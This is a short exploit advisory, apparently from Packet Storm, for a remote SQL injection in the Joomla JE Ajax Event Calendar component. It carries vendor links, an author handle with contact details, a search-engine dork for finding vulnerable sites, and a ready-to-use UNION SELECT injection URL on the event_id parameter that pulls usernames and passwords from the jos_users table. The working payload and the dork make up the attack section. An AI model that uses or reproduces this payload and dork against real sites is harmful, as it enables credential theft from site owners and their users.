The Joomla JE Ajax Event Calendar component suffers from a remote SQL injection vulnerability.
fd03b696bdb29bd73df3f9ee823b0dbe4d6d4cdd928223c1df82a4068b4523bf# Vendor:
http://joomlaextensions.co.in/extensions/components/je-ajax-event-calender.html
# Download:
http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/12110
# Author: altbta
# Contact: l_9[at]Hotmail[Dot]com
# Home: http://xp10.com
# Thanks to: rxh xp10.com >> v4-team.com >> p0c.cc :))
==========================================================================
[+] Dork: inurl:"index.php?option=com_jeajaxeventcalendar"
==========================================================================
[+] exploit:
http://127.168.1.1/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--
==========================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed